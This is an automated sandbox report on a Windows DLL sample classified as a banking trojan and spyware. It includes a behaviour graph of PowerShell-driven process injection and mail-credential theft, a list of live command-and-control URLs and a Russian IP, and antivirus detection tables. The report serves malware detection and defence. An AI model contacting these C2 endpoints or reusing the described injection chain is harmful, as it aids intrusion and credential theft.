                      behaviorgraph top1 signatures2 2 Behavior Graph ID: 498359 Sample: data.dll Startdate: 07/10/2021 Architecture: WINDOWS Score: 100 123 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->123 125 Multi AV Scanner detection for domain / URL 2->125 127 Found malware configuration 2->127 129 13 other signatures 2->129 9 mshta.exe 19 2->9         started        12 loaddll32.exe 1 1 2->12         started        15 mshta.exe 19 2->15         started        process3 dnsIp4 159 Suspicious powershell command line found 9->159 17 powershell.exe 9->17         started        99 art.microsoftsofymicrosoftsoft.at 194.147.86.221, 49776, 49777, 49778 NETRACK-ASRU Russian Federation 12->99 101 init.icecreambob.com 12->101 161 Writes to foreign memory regions 12->161 163 Writes or reads registry keys via WMI 12->163 165 Writes registry values via WMI 12->165 21 cmd.exe 1 12->21         started        23 rundll32.exe 12->23         started        25 control.exe 12->25         started        29 2 other processes 12->29 27 powershell.exe 15->27         started        signatures5 process6 file7 81 C:\Users\user\AppData\...\a52acufz.cmdline, UTF-8 17->81 dropped 131 Injects code into the Windows Explorer (explorer.exe) 17->131 133 Writes to foreign memory regions 17->133 135 Modifies the context of a thread in another process (thread injection) 17->135 137 Compiles code for process injection (via .Net compiler) 17->137 31 explorer.exe 17->31 injected 35 csc.exe 17->35         started        38 csc.exe 17->38         started        40 conhost.exe 17->40         started        42 rundll32.exe 21->42         started        139 System process connects to network (likely due to code injection or exploit) 23->139 141 Writes registry values via WMI 23->141 44 rundll32.exe 25->44         started        83 C:\Users\user\AppData\Local\...\keehvxm3.0.cs, UTF-8 27->83 dropped 143 Maps a DLL or memory area into another process 27->143 145 Creates a thread in another existing process (thread injection) 27->145 46 csc.exe 27->46         started        48 csc.exe 27->48         started        50 conhost.exe 27->50         started        signatures8 process9 dnsIp10 103 art.microsoftsofymicrosoftsoft.at 31->103 107 System process connects to network (likely due to code injection or exploit) 31->107 109 Tries to steal Mail credentials (via file access) 31->109 111 Changes memory attributes in foreign processes to executable or writable 31->111 121 3 other signatures 31->121 52 cmd.exe 31->52         started        55 cmd.exe 31->55         started        57 RuntimeBroker.exe 31->57 injected 69 3 other processes 31->69 85 C:\Users\user\AppData\Local\...\a52acufz.dll, PE32 35->85 dropped 59 cvtres.exe 35->59         started        87 C:\Users\user\AppData\Local\...\ddwuzigh.dll, PE32 38->87 dropped 61 cvtres.exe 38->61         started        105 init.icecreambob.com 42->105 113 Writes to foreign memory regions 42->113 115 Allocates memory in foreign processes 42->115 117 Modifies the context of a thread in another process (thread injection) 42->117 63 control.exe 42->63         started        89 C:\Users\user\AppData\Local\...\aixojixg.dll, PE32 46->89 dropped 65 cvtres.exe 46->65         started        91 C:\Users\user\AppData\Local\...\keehvxm3.dll, PE32 48->91 dropped 67 cvtres.exe 48->67         started        file11 119 May check the online IP address of the machine 103->119 signatures12 process13 signatures14 147 Uses nslookup.exe to query domains 52->147 71 nslookup.exe 52->71         started        75 conhost.exe 52->75         started        77 conhost.exe 55->77         started        149 Changes memory attributes in foreign processes to executable or writable 63->149 151 Writes to foreign memory regions 63->151 153 Allocates memory in foreign processes 63->153 155 3 other signatures 63->155 79 rundll32.exe 63->79         started        process15 dnsIp16 93 222.222.67.208.in-addr.arpa 71->93 95 resolver1.opendns.com 71->95 97 myip.opendns.com 71->97 157 May check the online IP address of the machine 71->157 signatures17

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      data.dll7%VirustotalBrowse

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      3.2.rundll32.exe.5d0000.0.unpack100%AviraHEUR/AGEN.1108168Download File
                      0.2.loaddll32.exe.dd0000.0.unpack100%AviraHEUR/AGEN.1108168Download File
                      5.2.rundll32.exe.4a70000.0.unpack100%AviraHEUR/AGEN.1108168Download File

                      Domains

                      SourceDetectionScannerLabelLink
                      init.icecreambob.com3%VirustotalBrowse
                      art.microsoftsofymicrosoftsoft.at10%VirustotalBrowse
                      222.222.67.208.in-addr.arpa2%VirustotalBrowse

                      URLs

                      SourceDetectionScannerLabelLink
                      http://init.icecreambob.com/FcQup_2BTAzx5PF2I3Tn/YlRrkU5iinU1xuRm5TK/CmVp_2BlzVsGcnrzGccrm7/ksEs9Imm100%Avira URL Cloudmalware
                      http://ns.adobe.co/xa0%Avira URL Cloudsafe
                      http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                      http://init.icecreambob.com/zx75I3NNGmfLGn8pRj68/5q8NiboB_2FSEFLMm1p/GkM07ifmkRoyAPVxlJaDy3/cXr6SDsbgoHPm/PaJLAxVV/txoYRHBbj9M336C_2FP0F_2/FUuIUTfxn8/_2Fi1Q9Nh_2BYEyGG/g7XOKDVcckgo/6ifLOiy2t7I/1SoBj6Jybx3_2F/lN5De25izDb_2BsQi5Wix/BNFu2ADC3y17pVCQ/oz9_2B52JzEyRR4/O_2FqG0LC5012e1TXc/xR9rFY1G5/iapdd6603NTaeINQSp_2/BwLMzJ7w5SugcYmEG0J/qMt4_2FOPEov9_2Bo1MdfB/1y5TCsV89mnx3/ekW9ulBTE4wo3daXfFHw/KT100%Avira URL Cloudmalware
                      http://ns.adobp/0%Avira URL Cloudsafe
                      http://constitution.org/usdeclar.txtC:0%URL Reputationsafe
                      https://contoso.com/License0%URL Reputationsafe
                      https://contoso.com/Icon0%URL Reputationsafe
                      http://init.icecreambob.com/FcQup_2BTAzx5PF2I3Tn/YlRrkU5iinU1xuRm5TK/CmVp_2BlzVsGcnrzGccrm7/ksEs9ImmPr12_/2Bzh4tdV/KDpXfYGpjXykhg2xrNZQnLl/eQWxO9UJs6/yiNSkrLwUALCzuZwZ/kdGCEU3rIU9m/RGyuFMKeogE/z1UGBluOo2rYqx/Sf1vojdcef_2FoAlYSwrS/eWFw3oSweCgrgQTo/R3sh0ZaR7_2BXrU/KBuwJkO2cZWh9s5jos/PpUP1bcud/5c_2B9g4iz3DCS_2B4Cz/pQllr8YcQ_2FVn4H2Us/rP5gQf2cVzgDcEADA7kdUN/KefPCJRSUE50z/YwbIZJdHqw/X0ic100%Avira URL Cloudmalware
                      http://https://file://USER.ID%lu.exe/upd0%Avira URL Cloudsafe
                      http://init.icecreambob.com/lbK100%Avira URL Cloudmalware
                      http://ns.adobe.cmg0%Avira URL Cloudsafe
                      https://www.tiktok.com/legal/report/feedback0%URL Reputationsafe
                      http://init.icecreambob.com/100%Avira URL Cloudmalware
                      http://constitution.org/usdeclar.txt0%URL Reputationsafe
                      http://init.icecreambob.com/og7BnMlwe_2BBL3VbbSex/Z2wNM4qLt9ZGOnrN/9je8jFPaDsbcMzh/J_2BWsBwN0E9DyNOrX/d2qP1bGCk/qJX6O5QV7cikPdeCysOT/SVA8NuODHqgxyywc97o/sy0RL7jVfhXgOS_2F71qSG/2FS97AOq0AZ7i/X9_2BsM8/SJH1OhdjW9LhTsNZM3lXLoj/SkVBjHPOLQ/6GYRgOB9uQP3Kv3KV/fG6AntXu_2Fz/nGnOrkp86kX/RqEbx2FTMLsnk_/2FwjN_2B5_2BN0BKA_2FD/vDq8sU2vs2Ajys3z/1dncEwDhZBm_2B_/2BT0IVCl_2Fi1ROltK/Ns3vDVNy1/kniVonoTwHdN/F4BE_2B100%Avira URL Cloudmalware
                      http://init.icecreambob.com/WD1GVGFxgZw/vdm2GeJ_2BleeD/xBKgH3gETrFFIsar7DerZ/qXw_2BmqCKfPdDFV/h8dkp6DT7p7lsEb/gtBepZBTsY8u6IZ_2B/slZYk8jOI/KWElWApc2AbPjj3JcqRW/pbQLCPSQWt3ZN3tjPe8/mXL41rn8MBcUk2OkcsuXJx/EoX5HyK9gu6tJ/HdiOJ_2F/vkfbE_2BFoaAHj2fO1r8paT/WkrWga9cjs/R1EobQ_2FVIB2FUG2/gDd0_2B_2Bn1/TZlCNHxakZo/w6E7c784GfHMDV/_2Fz5c89FcKDHFuQdUlIO/O21na4IIxgsQc_2B/zRGRLvdYbxEEQyb/llhWY2ulIai/ojLy100%Avira URL Cloudmalware
                      https://contoso.com/0%URL Reputationsafe
                      http://art.microsoftsofymicrosoftsoft.at/F8KV2hZoxO/U2sbox634rP29bJ_2/FXULDRGEtFfT/UZYVIFvPXHK/8dhg8UXIv347p9/lAjhFuG3pLkJW9jPts5ig/H4HccXVK4_2Fj3x4/JNX_2FOInLR8Nhr/AvMOGKETT4xKlbvgKV/ywk72W2sF/XRIveNKW0cDr2x9FlGme/9PA3AGNAa4JFJCkP8Ol/kE52dtLr2Gc2GIIsbVvLY7/_2FgegwtK4luv/WlDWKBm_/2BVUH_2FoyHiVnOSkUYW3XN/ZNo_2FlFkO/0PpkXJxUPRqbyltz6/D1_2B17g8RMv/LKZDclZ4G3c/Yy5W17MUWWbx9b/ZWlGh_2BykFLR0SdMWzQw/4cxn70%Avira URL Cloudsafe
                      http://ns.adobe.ux0%Avira URL Cloudsafe
                      http://init.icecreambob.com/zx75I3NNGmfLGn8pRj68/5q8NiboB_2FSEFLMm1p/GkM07ifmkRoyAPVxlJaDy3/cXr6SDsb100%Avira URL Cloudmalware
                      http://init.icecreambob.com/l100%Avira URL Cloudmalware
                      http://ns.micro/10%Avira URL Cloudsafe
                      http://init.icecreambob.com/2dRjaoZ5ba/_2B9OCZL2JKsW54Zw/b8_2FudlSzim/FebecF2Mr0l/RLhLAUL9EkrBQ6/jcfZJyjU6XRJEy_2F_2Fw/U4DTV9Ne0aXzpB9J/0iupMlpKOkgE91k/O1eWSmo3SiP86KIi_2/Fb913ObwC/qpNQAlO4bBFCqmydHOLy/nNarqOCZZOFGkIl4hzv/0jh_2Fn5oIgCb_2BiKYiQR/_2BU0c0XcTad1/VVgGQIES/_2B4c60XhwvhKtewqx0YhNF/9_2B9c5LC4/AStWPuhmAHWEYDBRQ/AKTTfZkbsU8X/VSsiQHsgzPR/ZrnjJVXfpIalCe/F_2BaXGFB0UzrQMjtIKjY/vg3Zv3Ys/i100%Avira URL Cloudmalware

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      myip.opendns.com
                      		102.129.143.57
                      		truefalse
                        		high
                        resolver1.opendns.com
                        		208.67.222.222
                        		truefalse
                          		high
                          init.icecreambob.com
                          		194.147.86.221
                          		truetrueunknown
                          art.microsoftsofymicrosoftsoft.at
                          		194.147.86.221
                          		truetrueunknown
                          222.222.67.208.in-addr.arpa
                          		unknown
                          		unknowntrueunknown

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          http://init.icecreambob.com/zx75I3NNGmfLGn8pRj68/5q8NiboB_2FSEFLMm1p/GkM07ifmkRoyAPVxlJaDy3/cXr6SDsbgoHPm/PaJLAxVV/txoYRHBbj9M336C_2FP0F_2/FUuIUTfxn8/_2Fi1Q9Nh_2BYEyGG/g7XOKDVcckgo/6ifLOiy2t7I/1SoBj6Jybx3_2F/lN5De25izDb_2BsQi5Wix/BNFu2ADC3y17pVCQ/oz9_2B52JzEyRR4/O_2FqG0LC5012e1TXc/xR9rFY1G5/iapdd6603NTaeINQSp_2/BwLMzJ7w5SugcYmEG0J/qMt4_2FOPEov9_2Bo1MdfB/1y5TCsV89mnx3/ekW9ulBTE4wo3daXfFHw/KTtrue
                          • Avira URL Cloud: malware
                          		unknown
                          http://init.icecreambob.com/FcQup_2BTAzx5PF2I3Tn/YlRrkU5iinU1xuRm5TK/CmVp_2BlzVsGcnrzGccrm7/ksEs9ImmPr12_/2Bzh4tdV/KDpXfYGpjXykhg2xrNZQnLl/eQWxO9UJs6/yiNSkrLwUALCzuZwZ/kdGCEU3rIU9m/RGyuFMKeogE/z1UGBluOo2rYqx/Sf1vojdcef_2FoAlYSwrS/eWFw3oSweCgrgQTo/R3sh0ZaR7_2BXrU/KBuwJkO2cZWh9s5jos/PpUP1bcud/5c_2B9g4iz3DCS_2B4Cz/pQllr8YcQ_2FVn4H2Us/rP5gQf2cVzgDcEADA7kdUN/KefPCJRSUE50z/YwbIZJdHqw/X0ictrue
                          • Avira URL Cloud: malware
                          		unknown
                          http://init.icecreambob.com/og7BnMlwe_2BBL3VbbSex/Z2wNM4qLt9ZGOnrN/9je8jFPaDsbcMzh/J_2BWsBwN0E9DyNOrX/d2qP1bGCk/qJX6O5QV7cikPdeCysOT/SVA8NuODHqgxyywc97o/sy0RL7jVfhXgOS_2F71qSG/2FS97AOq0AZ7i/X9_2BsM8/SJH1OhdjW9LhTsNZM3lXLoj/SkVBjHPOLQ/6GYRgOB9uQP3Kv3KV/fG6AntXu_2Fz/nGnOrkp86kX/RqEbx2FTMLsnk_/2FwjN_2B5_2BN0BKA_2FD/vDq8sU2vs2Ajys3z/1dncEwDhZBm_2B_/2BT0IVCl_2Fi1ROltK/Ns3vDVNy1/kniVonoTwHdN/F4BE_2Btrue
                          • Avira URL Cloud: malware
                          		unknown
                          http://init.icecreambob.com/WD1GVGFxgZw/vdm2GeJ_2BleeD/xBKgH3gETrFFIsar7DerZ/qXw_2BmqCKfPdDFV/h8dkp6DT7p7lsEb/gtBepZBTsY8u6IZ_2B/slZYk8jOI/KWElWApc2AbPjj3JcqRW/pbQLCPSQWt3ZN3tjPe8/mXL41rn8MBcUk2OkcsuXJx/EoX5HyK9gu6tJ/HdiOJ_2F/vkfbE_2BFoaAHj2fO1r8paT/WkrWga9cjs/R1EobQ_2FVIB2FUG2/gDd0_2B_2Bn1/TZlCNHxakZo/w6E7c784GfHMDV/_2Fz5c89FcKDHFuQdUlIO/O21na4IIxgsQc_2B/zRGRLvdYbxEEQyb/llhWY2ulIai/ojLytrue
                          • Avira URL Cloud: malware
                          		unknown
                          http://art.microsoftsofymicrosoftsoft.at/F8KV2hZoxO/U2sbox634rP29bJ_2/FXULDRGEtFfT/UZYVIFvPXHK/8dhg8UXIv347p9/lAjhFuG3pLkJW9jPts5ig/H4HccXVK4_2Fj3x4/JNX_2FOInLR8Nhr/AvMOGKETT4xKlbvgKV/ywk72W2sF/XRIveNKW0cDr2x9FlGme/9PA3AGNAa4JFJCkP8Ol/kE52dtLr2Gc2GIIsbVvLY7/_2FgegwtK4luv/WlDWKBm_/2BVUH_2FoyHiVnOSkUYW3XN/ZNo_2FlFkO/0PpkXJxUPRqbyltz6/D1_2B17g8RMv/LKZDclZ4G3c/Yy5W17MUWWbx9b/ZWlGh_2BykFLR0SdMWzQw/4cxn7true
                          • Avira URL Cloud: safe
                          		unknown
                          http://init.icecreambob.com/2dRjaoZ5ba/_2B9OCZL2JKsW54Zw/b8_2FudlSzim/FebecF2Mr0l/RLhLAUL9EkrBQ6/jcfZJyjU6XRJEy_2F_2Fw/U4DTV9Ne0aXzpB9J/0iupMlpKOkgE91k/O1eWSmo3SiP86KIi_2/Fb913ObwC/qpNQAlO4bBFCqmydHOLy/nNarqOCZZOFGkIl4hzv/0jh_2Fn5oIgCb_2BiKYiQR/_2BU0c0XcTad1/VVgGQIES/_2B4c60XhwvhKtewqx0YhNF/9_2B9c5LC4/AStWPuhmAHWEYDBRQ/AKTTfZkbsU8X/VSsiQHsgzPR/ZrnjJVXfpIalCe/F_2BaXGFB0UzrQMjtIKjY/vg3Zv3Ys/itrue
                          • Avira URL Cloud: malware
                          		unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          http://init.icecreambob.com/FcQup_2BTAzx5PF2I3Tn/YlRrkU5iinU1xuRm5TK/CmVp_2BlzVsGcnrzGccrm7/ksEs9Immrundll32.exe, 00000003.00000003.826552250.0000000000AE2000.00000004.00000001.sdmptrue
                          • Avira URL Cloud: malware
                          		unknown
                          http://nuget.org/NuGet.exepowershell.exe, 0000000F.00000002.1028779233.0000029E589A0000.00000004.00000001.sdmp, powershell.exe, 00000011.00000002.1004101775.0000026452371000.00000004.00000001.sdmpfalse
                            		high
                            http://twitter.com/spotify:RuntimeBroker.exe, 0000002E.00000000.997237662.000001B4FB11D000.00000004.00000001.sdmpfalse
                              		high
                              https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-AdventureRuntimeBroker.exe, 0000002E.00000000.996607736.000001B4FA387000.00000004.00000001.sdmpfalse
                                		high
                                http://ns.adobe.co/xaRuntimeBroker.exe, 0000002E.00000000.1018103499.000001B4F86D9000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000011.00000002.950014356.000002644251E000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000011.00000002.950014356.000002644251E000.00000004.00000001.sdmpfalse
                                  		high
                                  https://corp.roblox.com/contact/RuntimeBroker.exe, 0000002E.00000000.1001958208.000001B4FA332000.00000004.00000001.sdmpfalse
                                    		high
                                    https://www.roblox.com/developRuntimeBroker.exe, 0000002E.00000000.1001958208.000001B4FA332000.00000004.00000001.sdmpfalse
                                      		high
                                      http://ns.adobp/RuntimeBroker.exe, 0000002E.00000000.1018103499.000001B4F86D9000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://constitution.org/usdeclar.txtC:loaddll32.exe, 00000000.00000003.883939379.00000000049B8000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.886005688.0000000005C88000.00000004.00000040.sdmp, control.exe, 00000022.00000003.917302895.000002BED198C000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000025.00000002.1185993315.0000027D4F702000.00000004.00000001.sdmp, rundll32.exe, 0000002D.00000003.976333462.000002D2D6E3C000.00000004.00000040.sdmp, RuntimeBroker.exe, 0000002E.00000002.1188409559.000001B4FB502000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000030.00000002.1184142574.000001DA4C802000.00000004.00000001.sdmp, cmd.exe, 00000031.00000003.1072741613.00000000010F8000.00000004.00000040.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://contoso.com/Licensepowershell.exe, 00000011.00000002.1004101775.0000026452371000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://contoso.com/Iconpowershell.exe, 00000011.00000002.1004101775.0000026452371000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://https://file://USER.ID%lu.exe/updloaddll32.exe, 00000000.00000003.883939379.00000000049B8000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.886005688.0000000005C88000.00000004.00000040.sdmp, control.exe, 00000022.00000003.917302895.000002BED198C000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000025.00000002.1185993315.0000027D4F702000.00000004.00000001.sdmp, rundll32.exe, 0000002D.00000003.976333462.000002D2D6E3C000.00000004.00000040.sdmp, RuntimeBroker.exe, 0000002E.00000002.1188409559.000001B4FB502000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000030.00000002.1184142574.000001DA4C802000.00000004.00000001.sdmp, cmd.exe, 00000031.00000003.1072741613.00000000010F8000.00000004.00000040.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		low
                                      http://init.icecreambob.com/lbKrundll32.exe, 00000003.00000003.841424986.0000000000AF4000.00000004.00000001.sdmptrue
                                      • Avira URL Cloud: malware
                                      		unknown
                                      http://ns.adobe.cmgRuntimeBroker.exe, 0000002E.00000000.1018103499.000001B4F86D9000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://www.tiktok.com/legal/report/feedbackRuntimeBroker.exe, 0000002E.00000000.996607736.000001B4FA387000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.g5e.com/G5_End_User_License_Supplemental_TermsW~RuntimeBroker.exe, 0000002E.00000000.996607736.000001B4FA387000.00000004.00000001.sdmpfalse
                                        		high
                                        https://corp.roblox.com/parents/RuntimeBroker.exe, 0000002E.00000000.1001958208.000001B4FA332000.00000004.00000001.sdmpfalse
                                          		high
                                          https://github.com/Pester/Pesterpowershell.exe, 00000011.00000002.950014356.000002644251E000.00000004.00000001.sdmpfalse
                                            		high
                                            http://www.g5e.com/G5_End_User_License_Supplemental_TermsRuntimeBroker.exe, 0000002E.00000000.996607736.000001B4FA387000.00000004.00000001.sdmpfalse
                                              		high
                                              http://init.icecreambob.com/rundll32.exe, 00000003.00000003.841471789.0000000000AE2000.00000004.00000001.sdmptrue
                                              • Avira URL Cloud: malware
                                              		unknown
                                              http://constitution.org/usdeclar.txtloaddll32.exe, 00000000.00000003.883939379.00000000049B8000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.886005688.0000000005C88000.00000004.00000040.sdmp, control.exe, 00000022.00000003.917302895.000002BED198C000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000025.00000002.1185993315.0000027D4F702000.00000004.00000001.sdmp, rundll32.exe, 0000002D.00000003.976333462.000002D2D6E3C000.00000004.00000040.sdmp, RuntimeBroker.exe, 0000002E.00000002.1188409559.000001B4FB502000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000030.00000002.1184142574.000001DA4C802000.00000004.00000001.sdmp, cmd.exe, 00000031.00000003.1072741613.00000000010F8000.00000004.00000040.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://contoso.com/powershell.exe, 00000011.00000002.1004101775.0000026452371000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://nuget.org/nuget.exepowershell.exe, 0000000F.00000002.1028779233.0000029E589A0000.00000004.00000001.sdmp, powershell.exe, 00000011.00000002.1004101775.0000026452371000.00000004.00000001.sdmpfalse
                                                		high
                                                https://www.roblox.com/info/privacyRuntimeBroker.exe, 0000002E.00000000.1001958208.000001B4FA332000.00000004.00000001.sdmpfalse
                                                  		high
                                                  http://ns.adobe.uxRuntimeBroker.exe, 0000002E.00000000.1018103499.000001B4F86D9000.00000004.00000001.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.g5e.com/termsofserviceRuntimeBroker.exe, 0000002E.00000000.996607736.000001B4FA387000.00000004.00000001.sdmpfalse
                                                    		high
                                                    http://init.icecreambob.com/zx75I3NNGmfLGn8pRj68/5q8NiboB_2FSEFLMm1p/GkM07ifmkRoyAPVxlJaDy3/cXr6SDsbrundll32.exe, 00000003.00000003.841424986.0000000000AF4000.00000004.00000001.sdmptrue
                                                    • Avira URL Cloud: malware
                                                    		unknown
                                                    https://en.help.roblox.com/hc/en-usRuntimeBroker.exe, 0000002E.00000000.1001958208.000001B4FA332000.00000004.00000001.sdmpfalse
                                                      		high
                                                      http://init.icecreambob.com/lrundll32.exe, 00000003.00000003.831975638.0000000000AF4000.00000004.00000001.sdmptrue
                                                      • Avira URL Cloud: malware
                                                      		unknown
                                                      http://ns.micro/1RuntimeBroker.exe, 0000002E.00000000.1018103499.000001B4F86D9000.00000004.00000001.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 0000000F.00000002.963606313.0000029E48941000.00000004.00000001.sdmp, powershell.exe, 00000011.00000002.935740628.0000026442311000.00000004.00000001.sdmpfalse
                                                        		high

                                                        Contacted IPs

                                                        • No. of IPs < 25%
                                                        • 25% < No. of IPs < 50%
                                                        • 50% < No. of IPs < 75%
                                                        • 75% < No. of IPs

                                                        Public

                                                        IPDomainCountryFlagASNASN NameMalicious
                                                        194.147.86.221
                                                        		init.icecreambob.comRussian Federation
                                                        		61400NETRACK-ASRUtrue

                                                        General Information

                                                        Joe Sandbox Version:33.0.0 White Diamond
                                                        Analysis ID:498359
                                                        Start date:07.10.2021
                                                        Start time:01:30:08
                                                        Joe Sandbox Product:CloudBasic
                                                        Overall analysis duration:0h 14m 17s
                                                        Hypervisor based Inspection enabled:false
                                                        Report type:full
                                                        Sample file name:data.dll
                                                        Cookbook file name:default.jbs
                                                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                        Number of analysed new started processes analysed:46
                                                        Number of new started drivers analysed:0
                                                        Number of existing processes analysed:0
                                                        Number of existing drivers analysed:0
                                                        Number of injected processes analysed:0
                                                        Technologies:
                                                        • HCA enabled
                                                        • EGA enabled
                                                        • HDC enabled
                                                        • AMSI enabled
                                                        Analysis Mode:default
                                                        Analysis stop reason:Timeout
                                                        Detection:MAL
                                                        Classification:mal100.bank.troj.spyw.evad.winDLL@53/41@12/1
                                                        EGA Information:Failed
                                                        HDC Information:
                                                        • Successful, ratio: 27.3% (good quality ratio 26.4%)
                                                        • Quality average: 80.7%
                                                        • Quality standard deviation: 27.7%
                                                        HCA Information:
                                                        • Successful, ratio: 100%
                                                        • Number of executed functions: 162
                                                        • Number of non-executed functions: 336
                                                        Cookbook Comments:
                                                        • Adjust boot time
                                                        • Enable AMSI
                                                        • Found application associated with file extension: .dll
                                                        • Override analysis time to 240s for rundll32
                                                        Warnings:
                                                        Show All
                                                        • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
                                                        • Excluded IPs from analysis (whitelisted): 20.82.210.154, 95.100.218.79, 20.50.102.62, 20.82.209.183, 2.20.178.24, 2.20.178.33, 20.54.110.249, 40.112.88.60
                                                        • Excluded domains from analysis (whitelisted): iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, a1449.dscg2.akamai.net, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                        • Not all processes where analyzed, report is missing behavior information
                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                        • Report size getting too big, too many NtReadVirtualMemory calls found.

                                                        Simulations

                                                        Behavior and APIs

                                                        TimeTypeDescription
                                                        01:32:09API Interceptor4x Sleep call for process: loaddll32.exe modified
                                                        01:32:19API Interceptor2x Sleep call for process: rundll32.exe modified
                                                        01:32:30API Interceptor84x Sleep call for process: powershell.exe modified

                                                        Joe Sandbox View / Context

                                                        IPs

                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                        194.147.86.2212u2mgtylJy.dllGet hashmaliciousBrowse

                                                          Domains

                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                          myip.opendns.comtest1.dllGet hashmaliciousBrowse
                                                          • 102.129.143.57
                                                          test1.dllGet hashmaliciousBrowse
                                                          • 185.32.222.18
                                                          97Ys56eAFo.dllGet hashmaliciousBrowse
                                                          • 84.17.52.9
                                                          new_working_conditions[2021.09.23_12-51].xlsbGet hashmaliciousBrowse
                                                          • 84.17.52.9
                                                          OcEyzBswGm.exeGet hashmaliciousBrowse
                                                          • 84.17.52.41
                                                          Invoice778465.xlsbGet hashmaliciousBrowse
                                                          • 185.189.150.74
                                                          o0AX0nKiUn.dllGet hashmaliciousBrowse
                                                          • 84.17.52.3
                                                          document-1774544026.xlsGet hashmaliciousBrowse
                                                          • 84.17.52.79
                                                          316.xlsmGet hashmaliciousBrowse
                                                          • 84.17.52.79
                                                          moan.dllGet hashmaliciousBrowse
                                                          • 84.17.52.79
                                                          document-5505542.xlsmGet hashmaliciousBrowse
                                                          • 84.17.52.79
                                                          document-1223674862.xlsmGet hashmaliciousBrowse
                                                          • 84.17.52.79
                                                          e6.exeGet hashmaliciousBrowse
                                                          • 84.17.52.78
                                                          j81SoD9q5b.xlsGet hashmaliciousBrowse
                                                          • 84.17.52.78
                                                          xls.xlsGet hashmaliciousBrowse
                                                          • 84.17.52.38
                                                          0xyZ4rY0opA2.vbsGet hashmaliciousBrowse
                                                          • 84.17.52.25
                                                          6Xt3u55v5dAj.vbsGet hashmaliciousBrowse
                                                          • 84.17.52.25
                                                          2Q4tLHa5wbO1.vbsGet hashmaliciousBrowse
                                                          • 84.17.52.25
                                                          earmarkavchd.dllGet hashmaliciousBrowse
                                                          • 84.17.52.25
                                                          6znkPyTAVN7V.vbsGet hashmaliciousBrowse
                                                          • 84.17.52.25
                                                          resolver1.opendns.comtest1.dllGet hashmaliciousBrowse
                                                          • 208.67.222.222
                                                          test1.dllGet hashmaliciousBrowse
                                                          • 208.67.222.222
                                                          97Ys56eAFo.dllGet hashmaliciousBrowse
                                                          • 208.67.222.222
                                                          new_working_conditions[2021.09.23_12-51].xlsbGet hashmaliciousBrowse
                                                          • 208.67.222.222
                                                          20210915_id99.dllGet hashmaliciousBrowse
                                                          • 208.67.222.222
                                                          presentation[2021.09.09_15-26].vbsGet hashmaliciousBrowse
                                                          • 208.67.222.222
                                                          sample.vbsGet hashmaliciousBrowse
                                                          • 208.67.222.222
                                                          345678.vbsGet hashmaliciousBrowse
                                                          • 208.67.222.222
